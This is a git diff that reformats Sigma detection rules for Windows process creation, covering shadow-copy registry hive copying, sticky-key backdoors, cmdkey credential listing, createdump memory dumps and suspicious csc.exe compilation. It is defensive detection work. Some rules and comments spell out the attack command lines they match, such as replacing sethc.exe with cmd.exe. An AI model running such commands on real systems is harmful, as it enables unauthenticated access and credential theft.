477ee5997..4fccbf469 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -1,13 +1,12 @@ title: Suspicious CMD Shell Output Redirect id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 related: - - id: aa2efee7-34dd-446e-8a37-40790a66efd7 - type: derived - - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a - type: similar + - id: aa2efee7-34dd-446e-8a37-40790a66efd7 + type: derived + - id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a + type: similar status: experimental -description: Detects inline Windows shell commands redirecting output via the ">" - symbol to a suspicious location +description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,10 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli_1: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious locations as you find them + # The space from the start is missing to cover append operations ">>" - '> \Users\Public\' - '> %APPDATA%\' - '> %TEMP%\' @@ -45,16 +46,15 @@ detection: - '>C:\Users\Public\' - '>C:\Windows\Temp\' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - ' >' - '">' - - '''>' - CommandLine|contains|all: + - "'>" + CommandLine|contains|all: - C:\Users\ - \AppData\Local\ condition: process_creation and (selection_img and 1 of selection_cli_*) falsepositives: - - Legitimate admin or third party scripts used for diagnostic collection might - generate some false positives + - Legitimate admin or third party scripts used for diagnostic collection might generate some false positives level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml index a6ede1551..98999925d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_rmdir_execution.yml @@ -1,18 +1,11 @@ title: Directory Removal Via Rmdir id: 41ca393d-538c-408a-ac27-cf1e038be80c status: test -description: 'Detects execution of the builtin "rmdir" command in order to delete - directories. - +description: | + Detects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -30,12 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_rmdir: - CommandLine|contains: rmdir + CommandLine|contains: rmdir selection_flags: - CommandLine|contains: + CommandLine|contains: - /s - /q condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml index 3423e7ed4..d24132a78 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_shadowcopy_access.yml @@ -1,8 +1,7 @@ title: Copy From VolumeShadowCopy Via Cmd.EXE id: c73124a7-3e89-44a3-bdc1-25fe4df754b1 status: test -description: Detects the execution of the builtin "copy" command that targets a shadow - copy (sometimes used to copy registry hives that are in use) +description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) references: - https://twitter.com/vxunderground/status/1423336151860002816?s=20 - https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection @@ -21,7 +20,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + # cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ + # There is an additional "\" to escape the special "?" + CommandLine|contains|all: - 'copy ' - \\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml index 5952dd372..a60d3f6e0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_stdin_redirect.yml @@ -1,8 +1,8 @@ title: Read Contents From Stdin Via Cmd.EXE id: 241e802a-b65e-484f-88cd-c2dc10f9206d related: - - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 - type: obsoletes + - id: 00a4bacd-6db4-46d5-9258-a7d5ebff4003 + type: obsoletes status: test description: Detect the use of "<" to read and potentially execute a file via cmd.exe references: @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|contains: < + CommandLine|contains: < condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml index 056870a47..1008e10c5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml @@ -1,12 +1,10 @@ title: Sticky Key Like Backdoor Execution id: 2fdefcb3-dbda-401e-ae23-f0db027628bc related: - - id: baca5663-583c-45f9-b5dc-ea96a22ce542 - type: derived + - id: baca5663-583c-45f9-b5dc-ea96a22ce542 + type: derived status: test -description: Detects the usage and installation of a backdoor that uses an option - to register a malicious debugger for built-in tools that are accessible in the - login screen +description: Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen references: - https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community @@ -26,7 +24,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe @@ -34,7 +32,7 @@ detection: - Narrator.exe - DisplaySwitch.exe ParentProcessName|endswith: \winlogon.exe - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \cscript.exe - \mshta.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml index cc0fdea26..a466ee9c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_sticky_keys_replace.yml @@ -1,13 +1,9 @@ title: Persistence Via Sticky Key Backdoor id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3 status: test -description: 'By replacing the sticky keys executable with the local admins CMD executable, - an attacker is able to access a privileged windows console session without authenticating - to the system. - +description: | + By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched. - - ' references: - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html - https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf @@ -26,7 +22,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - '/y ' - C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml index 71bf6bd8e..b311dce75 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_unusual_parent.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe ParentProcessName|endswith: - \csrss.exe - \ctfmon.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml b/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml index 2afff6133..65c140427 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml @@ -1,8 +1,7 @@ title: New Generic Credentials Added Via Cmdkey.EXE id: b1ec66c6-f4d1-4b5c-96dd-af28ccae7727 status: test -description: Detects usage of cmdkey to add generic credentials. As an example, this - has to be used before connecting to an RDP session via command line interface. +description: Detects usage of cmdkey to add generic credentials. As an example, this has to be used before connecting to an RDP session via command line interface. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -18,10 +17,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - NewProcessName|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' /g' - ' /u' - ' /p' diff --git a/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml b/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml index 9527ac392..9467d1c35 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmdkey_recon.yml @@ -6,8 +6,7 @@ references: - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx - https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1003.005/T1003.005.md#atomic-test-1---cached-credential-dump-via-cmdkey -author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron - Systems) +author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2023/02/03 tags: @@ -21,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmdkey.exe - - OriginalFileName: cmdkey.exe + - NewProcessName|endswith: \cmdkey.exe + - OriginalFileName: cmdkey.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /l' - ' -l' condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml b/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml index 0cb8a8b83..89a3fcd4c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmstp_execution_by_creation.yml @@ -1,8 +1,7 @@ title: CMSTP Execution Process Creation id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47 status: stable -description: Detects various indicators of Microsoft Connection Manager Profile Installer - execution +description: Detects various indicators of Microsoft Connection Manager Profile Installer execution references: - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/ author: Nik Seetharaman @@ -18,6 +17,7 @@ logsource: category: process_creation product: windows detection: + # CMSTP Spawning Child Process process_creation: EventID: 4688 Channel: Security diff --git a/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml b/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml index 747fc5b9f..0c7afbb88 100644 --- a/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml +++ b/sigma/builtin/process_creation/proc_creation_win_conhost_legacy_option.yml @@ -1,9 +1,7 @@ title: Suspicious High IntegrityLevel Conhost Legacy Option id: 3037d961-21e9-4732-b27a-637bcc7bf539 status: test -description: ForceV1 asks for information directly from the kernel space. Conhost - connects to the console application. High IntegrityLevel means the process is - running with elevated privileges, such as an Administrator context. +description: ForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context. references: - https://cybercryptosec.medium.com/covid-19-cyber-infection-c615ead7c29 - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ @@ -21,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - conhost.exe - '0xffffffff' - -ForceV1 diff --git a/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml index fef8c0bd6..2e35d884f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_conhost_susp_child_process.yml @@ -1,8 +1,7 @@ title: Uncommon Child Process Of Conhost.EXE id: 7dc2dedd-7603-461a-bc13-15803d132355 status: experimental -description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" - usage as a LOLBIN or potential process injection activity. +description: Detects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity. references: - http://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/ author: omkar72 @@ -21,15 +20,14 @@ detection: selection: ParentProcessName|endswith: \conhost.exe filter_main_conhost: - NewProcessName|endswith: :\Windows\System32\conhost.exe + NewProcessName|endswith: :\Windows\System32\conhost.exe filter_main_null: - NewProcessName: null + NewProcessName: filter_main_empty: - NewProcessName: '' + NewProcessName: '' filter_optional_provider: - Provider_Name: SystemTraceProvider-Process - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + Provider_Name: SystemTraceProvider-Process # Race condition with SystemTrace doesn't provide all fields. + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml b/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml index 8a9fee794..35ec16bd2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_conhost_uncommon_parent.yml @@ -1,9 +1,7 @@ title: Conhost Spawned By Uncommon Parent Process id: cbb9e3d1-2386-4e59-912e-62f1484f7a89 status: experimental -description: Detects when the Console Window Host (conhost.exe) process is spawned - by an uncommon parent process, which could be indicative of potential code injection - activity. +description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity. references: - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html author: Tim Rauch @@ -20,9 +18,12 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: \conhost.exe + NewProcessName|endswith: \conhost.exe ParentProcessName|endswith: - \explorer.exe + # - '\csrss.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe + # - '\ctfmon.exe' # Seen several times in a testing environment + # - '\dllhost.exe' # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p' - \lsass.exe - \regsvr32.exe - \rundll32.exe @@ -31,6 +32,7 @@ detection: - \spoolsv.exe - \svchost.exe - \userinit.exe + # - '\wermgr.exe' # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe - \wininit.exe - \winlogon.exe filter_main_svchost: @@ -49,8 +51,7 @@ detection: ParentCommandLine|contains: - C:\Program Files (x86)\Dropbox\Client\ - C:\Program Files\Dropbox\Client\ - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: medium diff --git a/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml b/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml index 73007fa41..8156ebe99 100644 --- a/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml +++ b/sigma/builtin/process_creation/proc_creation_win_control_panel_item.yml @@ -21,26 +21,25 @@ detection: EventID: 4688 Channel: Security selection_reg_img: - - NewProcessName|endswith: \reg.exe - - OriginalFileName: reg.exe + - NewProcessName|endswith: \reg.exe + - OriginalFileName: reg.exe selection_reg_cli: - CommandLine|contains|all: + CommandLine|contains|all: - add - CurrentVersion\Control Panel\CPLs selection_cpl: - CommandLine|endswith: .cpl + CommandLine|endswith: .cpl filter_cpl_sys: - CommandLine|contains: + CommandLine|contains: - \System32\ - '%System%' - '|C:\Windows\system32|' filter_cpl_igfx: - CommandLine|contains|all: + CommandLine|contains|all: - 'regsvr32 ' - ' /s ' - igfxCPL.cpl - condition: process_creation and (all of selection_reg_* or (selection_cpl and - not 1 of filter_cpl_*)) + condition: process_creation and (all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml index f5c72e4b5..b87403ebe 100644 --- a/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_createdump_lolbin_execution.yml @@ -1,8 +1,8 @@ title: CreateDump Process Dump id: 515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48 related: - - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e - type: similar + - id: 1a1ed54a-2ba4-4221-94d5-01dee560d71e + type: similar status: test description: Detects uses of the createdump.exe LOLOBIN utility to dump process memory references: @@ -23,13 +23,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \createdump.exe - - OriginalFileName: FX_VER_INTERNALNAME_STR + - NewProcessName|endswith: \createdump.exe + - OriginalFileName: FX_VER_INTERNALNAME_STR selection_cli: - CommandLine|contains: - - ' -u ' + CommandLine|contains: + - ' -u ' # Short version of '--full' - ' --full ' - - ' -f ' + - ' -f ' # Short version of '--name' - ' --name ' - '.dmp ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml b/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml index 9927c603d..bda01d8dc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csc_susp_dynamic_compilation.yml @@ -1,8 +1,7 @@ title: Dynamic .NET Compilation Via Csc.EXE id: dcaa3f04-70c3-427a-80b4-b870d73c94c4 status: test -description: Detects execution of "csc.exe" to compile .NET code. Attackers often - leverage this to compile code on the fly and use it in other stages. +description: Detects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages. references: - https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/ - https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf @@ -23,33 +22,34 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: \csc.exe + NewProcessName|endswith: \csc.exe selection_susp_location_1: - CommandLine|contains: + CommandLine|contains: - :\Perflogs\ - :\Users\Public\ - - \AppData\Local\Temp\ + - \AppData\Local\Temp\ # User execution - \Temporary Internet - - \Windows\Temp\ + - \Windows\Temp\ # Admin execution selection_susp_location_2: - - CommandLine|contains|all: - - :\Users\ - - \Favorites\ - - CommandLine|contains|all: - - :\Users\ - - \Favourites\ - - CommandLine|contains|all: - - :\Users\ - - \Contacts\ - - CommandLine|contains|all: - - :\Users\ - - \Pictures\ + - CommandLine|contains|all: + - :\Users\ + - \Favorites\ + - CommandLine|contains|all: + - :\Users\ + - \Favourites\ + - CommandLine|contains|all: + - :\Users\ + - \Contacts\ + - CommandLine|contains|all: + - :\Users\ + - \Pictures\ selection_susp_location_3: - CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + CommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ filter_main_programfiles: + # Note: this is a generic filter. You could baseline execution in your env for a more robust rule ParentProcessName|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: ParentProcessName: C:\Windows\System32\sdiagnhost.exe filter_main_w3p: @@ -57,15 +57,16 @@ detection: filter_optional_chocolatey: ParentProcessName: C:\ProgramData\chocolatey\choco.exe filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. + # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_susp_location_* - and not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_susp_location_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Legitimate software from program files - https://twitter.com/gN3mes1s/status/1206874118282448897 - Legitimate Microsoft software - https://twitter.com/gabriele_pippi/status/1206907900268072962 diff --git a/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml b/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml index 078b473e0..5f21ac5b9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csc_susp_parent.yml @@ -1,14 +1,12 @@ title: Csc.EXE Execution Form Potentially Suspicious Parent id: b730a276-6b63-41b8-bcf8-55930c8fc6ee status: test -description: Detects a potentially suspicious parent of "csc.exe", which could be - a sign of payload delivery. +description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery. references: - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing - https://reaqta.com/2017/11/short-journey-darkvnc/ - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html -author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), - X__Junior (Nextron Systems) +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) date: 2019/02/11 modified: 2023/10/27 tags: @@ -26,8 +24,8 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \csc.exe - - OriginalFileName: csc.exe + - NewProcessName|endswith: \csc.exe + - OriginalFileName: csc.exe selection_parent_generic: ParentProcessName|endswith: - \cscript.exe @@ -46,28 +44,29 @@ detection: - \powershell.exe - \pwsh.exe selection_parent_susp_location: - - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ - - ParentCommandLine|contains: - - :\PerfLogs\ - - :\Users\Public\ - - :\Windows\Temp\ - - \Temporary Internet - - ParentCommandLine|contains|all: - - :\Users\ - - \Favorites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Favourites\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Contacts\ - - ParentCommandLine|contains|all: - - :\Users\ - - \Pictures\ + - ParentCommandLine|re: ([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\([Ll]ocal(Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$ + - ParentCommandLine|contains: + - :\PerfLogs\ + - :\Users\Public\ + - :\Windows\Temp\ + - \Temporary Internet + - ParentCommandLine|contains|all: + - :\Users\ + - \Favorites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Favourites\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Contacts\ + - ParentCommandLine|contains|all: + - :\Users\ + - \Pictures\ filter_main_programfiles: + # Note: this is a generic filter. You could baseline execution in your env for a more robust rule ParentProcessName|startswith: - - C:\Program Files (x86)\ - - C:\Program Files\ + - C:\Program Files (x86)\ # https://twitter.com/gN3mes1s/status/1206874118282448897 + - C:\Program Files\ # https://twitter.com/gN3mes1s/status/1206874118282448897 filter_main_sdiagnhost: ParentProcessName: C:\Windows\System32\sdiagnhost.exe filter_main_w3p: @@ -75,15 +74,16 @@ detection: filter_optional_chocolatey: ParentProcessName: C:\ProgramData\chocolatey\choco.exe filter_optional_defender: - ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced - Threat Protection + ParentCommandLine|contains: \ProgramData\Microsoft\Windows Defender Advanced Threat Protection filter_optional_ansible: + # Note: As ansible is widely used we exclude it with this generic filter. + # A better option would be to filter based on script content basis or other marker while hunting ParentCommandLine|contains: + # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}' - JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw - cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA - nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA - condition: process_creation and (selection_img and 1 of selection_parent_* and - not 1 of filter_main_* and not 1 of filter_optional_*) + condition: process_creation and (selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Unknown level: high diff --git a/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml b/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml index 1a1a0cc5a..a54d63b04 100644 --- a/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_csi_execution.yml @@ -1,11 +1,7 @@ title: Suspicious Csi.exe Usage id: 40b95d31-1afc-469e-8d34-9a3a667d058e status: test -description: "Csi.exe is a signed binary from Microsoft that comes with Visual Studio\ - \ and provides C# interactive capabilities. It can be used to run C# code from\ - \ a file passed as a parameter in command line. Early version of this utility\ - \ provided with Microsoft \u201CRoslyn\u201D Community Technology Preview was\ - \ named 'rcsi.exe'" +description: Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe' references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/ @@ -27,12 +23,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - \csi.exe - - \rcsi.exe - - OriginalFileName: - - csi.exe - - rcsi.exe + - NewProcessName|endswith: + - \csi.exe + - \rcsi.exe + - 